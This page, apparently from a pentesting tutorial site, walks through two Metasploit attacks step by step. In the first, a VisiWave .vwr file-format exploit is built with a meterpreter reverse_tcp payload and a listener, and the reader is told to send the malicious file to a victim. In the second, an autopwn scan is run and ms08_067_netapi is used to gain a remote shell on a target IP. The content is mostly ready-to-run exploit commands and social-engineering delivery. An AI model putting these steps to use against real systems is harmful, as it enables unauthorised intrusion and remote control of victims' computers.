Hacking Articles

This module exploits a vulnerability found in Visiwave Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the ‘Type’ property (valid ones include ‘Properties’, ‘Title Page’, ‘Details’, ‘Graph’, ‘Table’, ‘Text’, ‘Image’), but if a match isn’t found, the function that’s supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. NOTE: During installation, the application will register two file handles, VWS and VWR and allows a victim user to ‘double click’ the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.

Exploit Targets

Visiwave 2.1.8.150

Windows XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/visiwave_vwr_type

Msf exploit (visiwave_vwr_type)>set payload windows/meterpreter/reverse_tcp

Msf exploit (visiwave_vwr_type)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (visiwave_vwr_type)>exploit

After we successfully generate the malicious File, it will stored on your local computer

/root/.msf4/local/msf.vwr

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

Now send your msf.vwr files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

First Install Websploit Toolkit in Backtrack

You can view the Tutorial Here

Open Your Backtrack terminal and Type cd  /pentest/web/websploit

Now open WebSploit Toolkit (SET)  ./websploit

Now choose option 3 “Automatic Exploiter”

Now choose option 1 “Service Autopwn”

wsf: Autopwn > Enter Target IP Address: 192.168.1.56 (IP Address of Victim)

The results above are showing that the port 445 is open so we will try to use the netapi exploit.

The microsoft-ds are a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.

Now Type “Search netapi“ command in the console, this command will search for all the exploit modules with the pattern ”netapi“

Now type use exploit/windows/smb/ms08_067_netapi

Msf exploit (ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms08_067_netapi)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (ms08_067_netapi)>set rhost 192.168.1.56 (IP of Local Host)

Msf exploit (ms08_067_netapi)>exploit

For More about Meterpreter command visit Meterpreter Basic Commands